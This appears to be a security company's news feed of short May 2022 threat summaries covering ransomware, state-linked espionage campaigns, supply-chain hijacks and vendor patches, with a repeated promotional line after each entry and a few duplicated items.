Current Cyber Threats...

Industrial Spy Data Extortion Market Gets into the Ransomware
Date: 2022-05-25

The Industrial Spy data extortion marketplace has now launched its own ransomware operation, where they also encrypt victim's devices. The marketplace allows threat actors, even business competitors to purchase stolen data from various companies. This marketplace sells different types of stolen data, ranging from selling 'premium' data for millions of dollars to individual files for as little as $2.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Industrial Spy Data Extortion Market Gets into the Ransomware
Date: 2022-05-25

The Industrial Spy data extortion marketplace has now launched its own ransomware operation, where they also encrypt victim's devices. The marketplace allows threat actors, even business competitors to purchase stolen data from various companies. This marketplace sells different types of stolen data, ranging from selling 'premium' data for millions of dollars to individual files for as little as $2.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Hacker of Python, PHP Libraries: No “Malicious Activity” Was Intended
Date: 2022-05-25

The two applications in question where 'ctx' and 'PHPass' which together been downloaded over 3 million times. the incident sparked much panic and discussion among developers—now worried about the impact of the hijack on the overall software supply chain. It was yesterday when developers noticed that the two Python and PHP libraries where modified to harvest AWS developer credentials, in what was determined to be a bug-bounty exercise or was meant to be ethical in nature. However as a result of successful penetration testing, “The hijacked versions didn't stop at basic PoC—they stole the developer's environment variables and AWS credentials, casting doubts on the intention of the hijacker or if this was even ethical research.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Researchers Find New Malware Attacks Targeting Russian Government Entities
Date: 2022-05-25

An unknown advanced persistent threat (APT) group has been linked to a series of spear-phishing attacks targeting Russian government entities since the onset of the Russo-Ukrainian war in late February 2022. "The campaigns [...] are designed to implant a Remote Access Trojan (RAT) that can be used to surveil the computers it infects, and run commands on them remotely," Malwarebytes said in a technical report published Tuesday. The cybersecurity company attributed the attacks with low confidence to a Chinese hacking group, citing infrastructure overlaps between the RAT and Sakula Rat malware used by a threat actor known as Deep Panda.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

BPFDoor Malware Uses Solaris Vulnerability to Get Root Privileges
Date: 2022-05-25

New research into the inner workings of the stealthy BPFdoor malware for Linux and Solaris reveals that the threat actor behind it leveraged an old vulnerability to achieve persistence on targeted systems. BPFDoor is a custom backdoor that has been used largely undetected for at least five years in attacks against telecommunications, government, education, and logistics organizations. The malware was discovered only recently and reported first by researchers from PricewaterhouseCoopers (PwC), who attributed it to a China-based threat actor they track as Red Menshen. PwC found BPFDoor during an incident response engagement in 2021. Looking closer at the malware, the researchers noticed that it received commands from Virtual Private Servers (VPS) controlled through compromised routers in Taiwan.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

New Zoom Flaws Could Let Attac
Date: 2022-05-25

Popular video conferencing service Zoom has resolved as many as four security vulnerabilities, which could be exploited to compromise another user over chat by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages and execute malicious code.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Interpol Arrests Alleged Leader of the SilverTerrier BEC Gang
Date: 2022-05-25

After a year-long investigation that involved Interpol and several cybersecurity companies, the Nigeria Police Force has arrested an individual believed to be in the top ranks of a prominent business email compromise (BEC) group known as SilverTerrier or TMT. Codenamed Delilah, the law enforcement operation engaged police agencies across four continents and is the third one focused on identifying and arresting suspected members of the SilverTerrier gang.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Interpol Arrests Alleged Leader of the SilverTerrier BEC Gang
Date: 2022-05-25

After a year-long investigation that involved Interpol and several cybersecurity companies, the Nigeria Police Force has arrested an individual believed to be in the top ranks of a prominent business email compromise (BEC) group known as SilverTerrier or TMT. Codenamed Delilah, the law enforcement operation engaged police agencies across four continents and is the third one focused on identifying and arresting suspected members of the SilverTerrier gang.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

General Motors Credential Stuffing Attack Exposes Car Owners’ Info
Date: 2022-05-24

“US car manufacturer GM disclosed that it was the victim of a credential stuffing attack last month that exposed some customers' information and allowed hackers to redeem rewards points for gift cards. General Motors operates an online platform to help owners of Chevrolet, Buick, GMC, and Cadillac vehicles manage their bills, services, and redeem rewards points. Car owners can redeem GM rewards points towards GM vehicles, car service, accessories, and purchasing OnStar service plans.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

New Chaos Ransomware Builder Variant "Yashma" Discovered in the Wild
Date: 2022-05-24

The Research and Intelligence team at BlackBerry released a report today detailing a new version of the Chaos ransomware line, dubbed Yashma. Chaos is a customizable ransomware builder that emerged in underground forums on June 9, 2021, by falsely marketing itself as the .NET version of Ryuk despite sharing no such overlaps with the notorious counterpart. Since its discovery, the ransomware builder has undergone five successive iterations aimed at improving its functionalities: version 2.0 on June 17, version 3.0 on July 5, version 4.0 on August 5, and version 5.0 in early 2022.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Microsoft Warns of Web Skimmers Mimicking Google Analytics and Meta Pixel Code
Date: 2022-05-24

Microsoft recently observed web skimming campaigns employing various obfuscation techniques to deliver and hide skimming scripts. "It's a shift from earlier tactics where attackers conspicuously injected malicious scripts into e-commerce platforms and content management systems (CMSs) via vulnerability exploitation, making this threat highly evasive to traditional security solutions," Microsoft 365 Defender Research Team said in a new report.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Researchers to Release Exploit for New VMware Auth Bypass, Patch Now
Date: 2022-05-24

Identified as CVE-2022-22972, the security issue received a fix last Wednesday, accompanied by an urgent warning for administrators to install the patch or apply mitigations immediately. In an advisory on May 18th, VMware warned that the security implications for leaving CVE-2022-22972 unpatched are severe as the issue is "in the critical severity range with a maximum CVSSv3 base score of 9.8," with 10 being the maximum.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Nation-state Malware Could Become a Commodity on Dark Web Soon, Interpol Warns
Date: 2022-05-24

Interpol Secretary General Jurgen Stock declared that nation-state malware will become available on the darknet in a couple of years. In the ongoing conflict between Russia and Ukraine, the malware developed by both nation-state actors and non state actors represents a serious risk for critical infrastructure and organizations worldwide”.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Nation-state Malware Could Become a Commodity on Dark Web Soon, Interpol Warns
Date: 2022-05-23

“Interpol Secretary General Jurgen Stock declared that nation-state malware will become available on the darknet in a couple of years. In the ongoing conflict between Russia and Ukraine, the malware developed by both nation-state actors and non state actors represents a serious risk for critical infrastructure and organizations worldwide” (Security Affairs, 2022).

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Chinese "Twisted Panda" Hackers Caught Spying on Russian Defense Institutes
Date: 2022-05-23

At least two research institutes located in Russia and a third likely target in Belarus have been at the receiving end of an espionage attack by a Chinese nation-state advanced persistent threat (APT). The attacks, codenamed "Twisted Panda," come in the backdrop of Russia's military invasion of Ukraine, prompting a wide range of threat actors to swiftly adapt their campaigns on the ongoing conflict to distribute malware and stage opportunistic attacks. They have materialized in the form of social engineering schemes with topical war and sanctions-themed baits orchestrated to trick potential victims into clicking malicious links or opening weaponized documents.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Russian Hackers Perform Reconnaissance Against Austria, Estonia
Date: 2022-05-23

In a new reconnaissance campaign, the Russian state-sponsored hacking group Turla was observed targeting the Austrian Economic Chamber, a NATO platform, and the Baltic Defense College. This discovery comes from cybersecurity firm Sekoia, which built upon previous findings of Google’s TAG, which has been following Russian hackers closely this year. Google warned about coordinated Russian-based threat group activity in late March 2022, while in May, they spotted two Turla domains used in ongoing campaigns. Sekoia used this information to investigate further and found that Turla targeted the federal organization in Austria and the military college in the Baltic region.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Google: Predator Spyware Infected Android Devices Using Zero-Days
Date: 2022-05-23

Google's Threat Analysis Group (TAG) says that state-backed threat actors used five zero-day vulnerabilities to install Predator spyware developed by commercial surveillance developer Cytrox. In these attacks, part of three campaigns that started between August and October 2021, the attackers used zero-day exploits targeting Chrome and the Android OS to install Predator spyware implants on fully up-to-date Android devices.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Threat Actors Target the InfoSec Community with Fake PoC Exploits
Date: 2022-05-23

Researchers from threat intelligence firm Cyble uncovered a malware campaign targeting the infoSec community. The expert discovered a post where a researcher were sharing a fake Proof of Concept (POC) exploit code for an RPC Runtime Library Remote Code Execution flaw (CVE-2022-26809 CVSS 9.8). The malware, disguised as a fake PoC code, was available on GitHub.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Cisco Urges Admins to Patch IOS XR Zero-day Exploited in Attacks
Date: 2022-05-23

Cisco has addressed a zero-day vulnerability in its IOS XR router software that allowed unauthenticated attackers to remotely access Redis instances running in NOSi Docker containers. The IOS XR Network OS is deployed on multiple Cisco router platforms, including NCS 540 & 560, NCS 5500, 8000, and ASR 9000 series routers.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Researchers Uncover Rust Supply-Chain Attack Targeting Cloud CI Pipelines
Date: 2022-05-20

A case of software supply chain attack has been observed in the Rust programming language's crate registry that leveraged typosquatting techniques to publish a rogue library containing malware. Cybersecurity firm SentinelOne dubbed the attack "CrateDepression."

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Conti Ransomware Shuts Down Operation, Rebrands Into Smaller Units
Date: 2022-05-20

Advanced Intel researcher Yelisey Boguslavskiy, announced on Twitter yesterday that the Conti ransomware gang has officially shut down its operation, stating the gang’s internal infrastructure was turned off. “While public-facing 'Conti News' data leak and the ransom negotiation sites are still online, Boguslavskiy told BleepingComputer that the Tor admin panels used by members to perform negotiations and publish "news" on their data leak site are now offline”

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Microsoft Detects Massive Surge in Linux XorDdos Malware Activity
Date: 2022-05-20

Microsoft stated in a blog post yesterday that it has seen a 254% increase in activity from a Linux trojan called XorDdos. XorDdos is a modular malware that amasses botnets by targeting a multitude of Linux system architectures (ARM, x86, and x64). First discovered in 2014 by the research group MalwareMustDie, XorDdos was named after its usage of XOR-based encryption for C2 communication and being employed to launch distributed denial-of-service (DDoS) attacks. As the tech giant revealed, the botnet’s success is likely due to its extensive use of various evasion and persistence tactics which allow it to remain stealthy and hard to remove.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Modern "Smart" Farm Machinery Vulnerable to Cyber-Attackers
Date: 2022-05-20

A new risk analysis published today warns that modern “smart” farm machinery is vulnerable to malicious hackers, leaving global supply chains exposed to risk. The analysis, published in the journal Nature Machine Intelligence, warns that hackers could exploit flaws in agricultural hardware used to plant and harvest crops. Additionally, it said automatic crop sprayers, drones and robotic harvesters could be vulnerable to hackers.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Canada Bans Huawei and ZTE from 5G Networks Over Security Concerns
Date: 2022-05-19

The Government of Canada announced its intention to ban the use of Huawei and ZTE telecommunications equipment and services across the country's 5G and 4G networks. The statement explains that after a thorough review from Canada's independent security agencies, the two Chinese tech companies have been deemed too great of a security risk to be allowed in the country's telecommunication network.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Jupiter WordPress Plugin Flaws Let Hackers Take Over Sites
Date: 2022-05-19

WordPress security analysts have discovered a set of vulnerabilities impacting the Jupiter Theme and JupiterX Core plugins for WordPress, one of which is a critical privilege escalation flaw. Jupiter is a powerful high-quality theme builder for WordPress sites used by over 90,000 popular blogs, online mags, and platforms that enjoy heavy user traffic. The vulnerability, tracked as CVE-2022-1654, and given a CVSS score of 9.9 (critical), allows any authenticated user on a site using the vulnerable plugins to gain administrative privileges.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

QNAP Alerts NAS Customers of New Deadbolt Ransomware Attacks
Date: 2022-05-19

Taiwan-based network-attached storage (NAS) maker QNAP warned customers on Thursday to secure their devices against attacks pushing DeadBolt ransomware payloads. The company asked users to update their NAS devices to the latest software version and ensure that they're not exposed to remote access over the Internet.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Web Trackers Caught Intercepting Online Forms Even Before Users Hit Submit
Date: 2022-05-19

A new research published by academics from KU Leuven, Radboud University, and the University of Lausanne has revealed that users' email addresses are exfiltrated to tracking, marketing, and analytics domains before such is submitted and without prior consent. The study involved crawling 2.8 million pages from the top 100 websites, and found that as many as 1,844 websites allowed trackers to capture email addresses before form submission in the European Union, a number that jumped to 2,950 when the same set of websites were visited from the U.S.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

China-linked Space Pirates APT Targets the Russian Aerospace Industry
Date: 2022-05-19

A previously unknown Chinese cyberespionage group, tracked as ‘Space Pirates’, targets enterprises in the Russian aerospace industry with spear-phishing attacks. The group has been active since at least 2017, researchers believe it is linked with other China-linked APT groups, including APT41 (Winnti), Mustang Panda, and APT27.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Ransomware Gangs Rely More on Weaponizing Vulnerabilities
Date: 2022-05-19

Group IB released a report this week outline various tactics ransomware groups are using to breach victim networks. According to their research, external remote access services continue to be the main attack vector used by ransomware gangs to gain initial access. However, they note that there has been an uptick in the use of exploitable vulnerabilities.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

VMware Patches Critical Auth Bypass Flaw in Multiple Products
Date: 2022-05-18

VMware warned customers today to immediately patch a critical authentication bypass vulnerability "affecting local domain users" in multiple products that can be exploited to obtain admin privileges. The flaw (tracked as CVE-2022-22972) was reported by Bruno López of Innotec Security, who found that it impacts Workspace ONE Access, VMware Identity Manager (vIDM), and vRealize Automation.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Microsoft Warns of "Cryware" Info-Stealing Malware Targeting Crypto Wallets
Date: 2022-05-18

Microsoft is warning of an emerging threat targeting internet-connected cryptocurrency wallets, signaling a departure in the use of digital coins in cyberattacks. The tech giant dubbed the new threat "cryware," with the attacks resulting in the irreversible theft of virtual currencies by means of fraudulent transfers to an adversary-controlled wallet.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

[WS] Wizard Spider Group In-Depth Analysis
Date: 2022-05-18

On May 16, 2022, the threat intelligence team at PRODAFT (PTI) released a report detailing the inner workings of the Wizard Spider group. Wizard Spider is a financially motivated cybercrime group that is believed to operate out of Russia. The group was first identified in 2017 and is known for the creation and deployment of TrickBot, a modular malware that was officially discounted earlier this year. Wizard Spider possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals. The group has been tied to various malware variants including Ryuk, Conti, Bazar, Cobalt Strike, etc.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Researchers Spotted a New Variant of the UpdateAgent macOS Malware Dropper
Date: 2022-05-18

Researchers from the Jamf Threat Labs team have uncovered a new variant of the UpdateAgent macOS malware dropper. The new version is written in Swift and relies on the AWS infrastructure to host its malicious payloads. The malware dropper has a variety of capabilities including system fingerprinting, endpoint registration, and persistence tools. For second stage payloads, researchers found evidence of different types of malware, spyware and adware.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Microsoft Warns of Brute-force Attacks Targeting MSSQL Servers
Date: 2022-05-18

Microsoft warned of brute-forcing attacks targeting Internet-exposed and poorly secured Microsoft SQL Server (MSSQL) database servers using weak passwords. While this isn't necessarily the first time MSSQL servers have been targeted in such attacks, Microsoft says that the threat actors behind this recently observed campaign are using the legitimate sqlps.exe tool as a LOLBin (short for living-off-the-land binary)

The threat actors are using the sqlps[.]exe utility to achieve fileless persistence. The executable is a PowerShell wrapper used for running SQL-built commands. The executable is also used to create a new sysadmin account which allows them to take control of the SQL server. From there they can perform other actions and deploy additional payloads like ransomware or cryptominers.


Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

A Custom Powershell RAT Uses to Target German Users Using Ukraine Crisis as Bait
Date: 2022-05-17

Researchers at Malwarebytes uncovered a campaign that targets German users with a custom PowerShell RAT. The threat actors attempt to trick victims into opening weaponized documents by using the current situation in Ukraine as bait. The attackers registered a decoy site that was an expired German domain name at collaboration-bw[.]de. The site was hosting a bait document, named “2022-Q2-Bedrohungslage-Ukraine,” used to deliver the custom malware. The document appears to contain information about the current crisis in Ukraine.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Hackers Target Tatsu WordPress Plugin in Millions of Attacks
Date: 2022-05-17

Hackers are massively exploiting a remote code execution vulnerability, CVE-2021-25094, in the Tatsu Builder plugin for WordPress, which is installed on about 100,000 websites. Tatsu Builder is a popular plugin that offers powerful template editing features integrated right into the web browser. Large attack waves started on May 10, 2022 and peaked four days later. Exploitation is currently ongoing.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

US Warning: North Korea's Tech Workers Posing as Freelance Developers
Date: 2022-05-17

Skilled software and mobile app developers from North Korea are posing as US-based remote workers to land contract work as developers in US and European tech and crypto firms. The warning comes in a new joint advisory from The US Department of State, the US Department of the Treasury, and the Federal Bureau of Investigation (FBI) outlining the role North Korean IT workers play in raising revenue for North Korea, which contributes to its weapons of mass destruction (WMD) and ballistic missile programs, in violation of U.S. and UN sanctions.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

CISA Warns Admins to Patch Actively Exploited VMware, Zyxel Bugs
Date: 2022-05-17

CISA has added two more vulnerabilities to its list of actively exploited bugs, a code injection bug in the Spring Cloud Gateway library and a command injection flaw in Zyxel firmware for business firewalls and VPN devices. The Spring Framework vulnerability (CVE-2022-22947) is a maximum severity weakness that attackers can abuse to gain remote code execution on unpatched hosts. The vulnerability is being used by a recently discovered botnet called Sysrv, which is installing cryptomining malware on vulnerable Windows and Linux servers.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Ukraine CERT-UA Warns of New Attacks Launched by Russia-linked Armageddon APT
Date: 2022-05-16

Ukraine CERT has released details on a new phishing attack carried out by the Russian linked Armageddon group. The threat actors are using a HTM-file to decode and create an archive named “Henson[.]rar” which contains a malicious LNK file titled “”Kherson[.]lnk.” ”Upon clicking on the link file, the HTA-file “precarious[.]xml” is loaded and executed leading to the creation and execution of files “desktop[.]txt” and “user[.]txt”. In the last stage of the attack chain, the GammaLoad[.]PS1_v2 malware is downloaded and executed on the victim’s computer.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Hackers are Exploiting Critical Bug in Zyxel Firewalls and VPNs
Date: 2022-05-16

Hackers have started to exploit a recently patched critical vulnerability tracked as CVE-2022-30525, that affects Zyxel firewall and VPN devices for businesses. Successful exploitation allows a remote attacker to inject arbitrary commands remotely without authentication, which can enable setting up a reverse shell.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

SonicWall ‘Strongly Urges’ Admins to Patch SSLVPN SMA1000 Bugs
Date: 2022-05-16

SonicWall "strongly urges" customers to patch several high-risk security flaws impacting its Secure Mobile Access (SMA) 1000 Series line of products that can let attackers bypass authorization and, potentially, compromise unpatched appliances. SonicWall SMA 1000 SSLVPN solutions are used by enterprises to simplify end-to-end secure remote access to corporate resources across on-prem, cloud, and hybrid data center environments.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Engineering Firm Parker Discloses Data Breach After Ransomware Attack
Date: 2022-05-16

The Parker-Hannifin Corporation announced a data breach exposing employees' personal information after the Conti ransomware gang began publishing allegedly stolen data last month. Parker is an Ohio-based corporation specializing in advanced motion and control technologies, with a strong focus in aerospace hydraulic equipment. It has a revenue of $15.6 billion and employs over 58,000 people.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Microsoft: Sysrv Botnet Targets Windows, Linux Servers With New Exploits
Date: 2022-05-16

Microsoft says the Sysrv botnet is now exploiting vulnerabilities in the Spring Framework and WordPress to ensnare and deploy cryptomining malware on vulnerable Windows and Linux servers. Redmond discovered a new variant (tracked as Sysrv-K) that has been upgraded with more capabilities, including scanning for unpatched WordPress and Spring deployments.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

New Saitama Backdoor Targeted Official From Jordan's Foreign Ministry
Date: 2022-05-13

A spear-phishing campaign targeting Jordan's foreign ministry has been observed dropping a new stealthy backdoor dubbed Saitama. Researchers from Malwarebytes and Fortinet FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat actor tracked under the moniker APT34, citing resemblances to past campaigns staged by the group.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Google Chrome Updates Failing on Android Devices in Russia
Date: 2022-05-13

A growing number of Android Google Chrome users in Russia are reporting errors when attempting to install the latest update for the web browser. The number of complaints is increasing every day but so far, the cause of the problem remains unknown and is still unsolved.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Zyxel Fixes Firewall Flaws That Could Lead To Hacked Networks
Date: 2022-05-13

Zyxel has fixed critical firewall vulnerabilities that could have allowed threat actors to gain full access to devices and the internal corporate networks they are designed to protect. The company pushed out the security updates in a silent update two weeks ago but more details emerged recently.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

A 10-point Plan to Improve the Security of Open Source Software
Date: 2022-05-13

The Linux Foundation and the Open Source Software Security Foundation, with input provided by executives from 37 companies and many U.S. government leaders, delivered a 10-point plan to broadly address open source and software supply chain security, by securing open source security production, improving vulnerability discovery and remediation, and shortening the patching response time of the ecosystem.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Ukrainian Gets Four Years for Brute Forcing Thousands of Credentials
Date: 2022-05-13

A Ukrainian man has been handed a four-year jail term for stealing thousands of server logins and putting them up for sale on the dark web. Glib Oleksandr Ivanov-Tolpintsev, 28, from Chernivtsi, was arrested in October 2020 by Polish police and subsequently extradited to the US, where he pleaded guilty in February this year.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Personal Details of 21M SuperVPN, GeckoVPN Users Leaked on Telegram
Date: 2022-05-12

On May 7th, researchers became aware of an online database containing personal details and login credentials for 21 million users of various VPN providers. The leaked database contains 10GBs of sensitive information from SuperVPN, GeckoVPN, and ChatVPN. The details from the database were actually stolen over a year ago and were put up for sale on Dark Web marketplaces. Now, the information is publicly available on Telegram for free.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Costa Rica Declares National Emergency Following Conti Cyber-Attack
Date: 2022-05-12

Costa Rica has declared a national emergency following sustained cyber-attacks on government systems by the Russia-based Conti ransomware gang. The decree, signed by newly-elected President Rodrigo Chaves, is believed to be the first-ever response of this type by a government to a cyber-attack. Chaves described the attack, which took place on April 18, as an act of “cyber terrorism” .

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

HP Fixes Bug Letting Attackers Overwrite Firmware in Over 200 Models
Date: 2022-05-12

HP has released BIOS updates today to fix two high-severity vulnerabilities affecting a wide range of PC and notebook products, which allow code to run with Kernel privileges. Kernel-level privileges are the highest rights in Windows, allowing threat actors to execute any command at the Kernel level, including manipulating drivers and accessing the BIOS.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Iranian Hackers Leveraging BitLocker and DiskCryptor in Ransomware Attacks.
Date: 2022-05-12

A ransomware group with an Iranian operational connection has been linked to a string of file-encrypting malware attacks targeting organizations in Israel, the U.S., Europe, and Australia. Cybersecurity firm Secureworks attributed the intrusions to a threat actor it tracks under the moniker Cobalt Mirage, which it said is linked to an Iranian hacking crew dubbed Cobalt Illusion (aka APT35, Charming Kitten, Newscaster, or Phosphorus)

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Massive Hacking Campaign Compromised Thousands of WordPress Websites - New resource in watched category
Date: 2022-05-12

Cybersecurity researchers from Sucuri uncovered a massive campaign that compromised thousands of WordPress websites by injecting malicious JavaScript code that redirects visitors to scam content. According to Sucuri, at least 322 websites were compromised as a result of this new wave of attacks. The infections automatically redirect site visitors to third-party websites containing malicious content (i.e. phishing pages, malware downloads), scam pages, or commercial websites to generate illegitimate traffic.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

CISA Alert: Protecting Against Cyber Threats to Managed Service Providers and their Customers
Date: 2022-05-12

The cybersecurity authorities of the United Kingdom (NCSC-UK), Australia (ACSC), Canada (CCCS), New Zealand (NCSC-NZ), and the United States (CISA), (NSA), (FBI) are aware of recent reports that observe an increase in malicious cyber activity targeting managed service providers (MSPs) and expect this trend to continue.[1] This joint Cybersecurity Advisory (CSA) provides actions MSPs and their customers can take to reduce their risk of falling victim to a cyber intrusion. This advisory describes cybersecurity best practices for information and communications technology (ICT) services and functions, focusing on guidance that enables transparent discussions between MSPs and their customers on securing sensitive data. Organizations should implement these guidelines as appropriate to their unique environments, in accordance with their specific security needs, and in compliance with applicable regulations. MSP customers should verify that the contractual arrangements with their provider include cybersecurity measures in line with their particular security requirements.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Researchers Warn of Nerbian RAT Targeting Entities in Italy, Spain, and the U.K - New resource in watched category
Date: 2022-05-11

A previously undocumented remote access trojan (RAT) written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K. Called Nerbian RAT by enterprise security firm Proofpoint, the novel malware leverages COVID-19-themed lures to propagate as part of a low volume email-borne phishing campaign that started on April 26, 2022.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

New IceApple Exploit Toolset Deployed on Microsoft Exchange Servers - New resource in watched category
Date: 2022-05-11

Security researchers have found a new post-exploitation framework that they dubbed IceApple, deployed mainly on Microsoft Exchange servers across a wide geography. IceApple is a highly sophisticated .NET-based framework that comes with at least 18 modules, each for a specific task, that help the attacker discover relevant machines on the network, steal credentials, delete files and directories, or exfiltrate valuable data. These modules run in memory, emphasizing the adversary’s priority of maintaining a low forensic footprint on the infected host.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia - New resource in watched category
Date: 2022-05-11

An espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021. Cybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the Bitter APT based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Threat Actors are Actively Exploiting CVE-2022-1388 RCE in F5 BIG-IP updated: CISA Tells Federal Agencies to Fix Actively Exploited F5 BIG-IP Bug
Date: 2022-05-11

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a new security vulnerability to its list of actively exploited bugs, the critical severity CVE-2022-1388 affecting BIG-IP network devices. F5 customers using BIG-IP solutions include governments, Fortune 500 firms, banks, service providers, and consumer brands (including Microsoft, Oracle, and Facebook), with the company claiming that "48 of Fortune 50 companies are F5 customers

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Hackers are Using Tech Services Companies as a 'Launchpad' for Attacks on Customers - New resource in watched category
Date: 2022-05-11

International cybersecurity agencies are urging IT service providers and their customers to take actions to protect themselves from the threat of supply chain attacks. The cybersecurity agencies warn that Russia's invasion of Ukraine has increased the risk of cyberattacks against organizations around the world. But they also suggest a number of actions that IT and cloud service providers, along with their customers, can take to protect networks from supply chain attacks, where attackers gain access to a company that provides software or services to many other companies. "As this advisory makes clear, malicious cyber actors continue to target managed service providers, which is why it's critical that MSPs and their customers take recommended actions to protect their networks," said Jen Easterly, director of US's Cybersecurity and Infrastructure Security Agency (CISA).

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Microsoft Patch Tuesday
Date: 2022-05-10

This month, Microsoft released patches for 75 vulnerabilities. Of these 74, 7 are critical (2 elevation of privilege and 5 remote code execution), 66 are important, and 1 is rated as low. There is one zero-day vulnerability (CVE-2022-26925) that has been publicly disclosed and exploited in the wild. Two other vulnerabilities (CVE-2022-22713 and CVE-2022-29972) have been publicly disclosed but not yet observed exploited in the wild.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

New REvil Samples Indicate Ransomware Gang is Back After Months of Inactivity
Date: 2022-05-10

The notorious ransomware operation known as REvil (aka Sodin or Sodinokibi) has resumed after six months of inactivity, an analysis of new ransomware samples has revealed. "Analysis of these samples indicates that the developer has access to REvil's source code, reinforcing the likelihood that the threat group has reemerged," researchers from Secureworks Counter Threat Unit (CTU) said in a report published Monday.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Hacktivists Hacked Russian TV Schedules During Victory Day and Displayed Anti-war Messages
Date: 2022-05-10

Since Russia’s invasion of Ukraine, Hacktivists and white hat hackers have continued to support Ukraine by launching cyberattacks on Russian websites and infrastructure. In a recent attack, they defaced Russian TV with anti-war messages and took down the RuTube video streaming site. The attack took place during Russia’s Victory Day, Russians attempting to view the parade were displayed Pro-Ukraine messages due to a cyber attack that impacted the Russian TV listings systems. According to the BBC, the coordinated attack affected major Russian networks, including Channel One, Rossiya-1, MTS, Rostelecom, and NTV-Plus.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Lincoln College to Close After 157 Years Due to Ransomware Attack
Date: 2022-05-10

Lincoln College, a liberal-arts school from rural Illinois, says it will close its doors later this month, 157 years since its founding and following a brutal hit on its finances from the COVID-19 pandemic and a recent ransomware attack. This decision was made even harder with the college having survived multiple disasters, including a major fire in 1912, the Spanish flu, the Great Depression, the World Wars, and the 2008 global financial crisis.

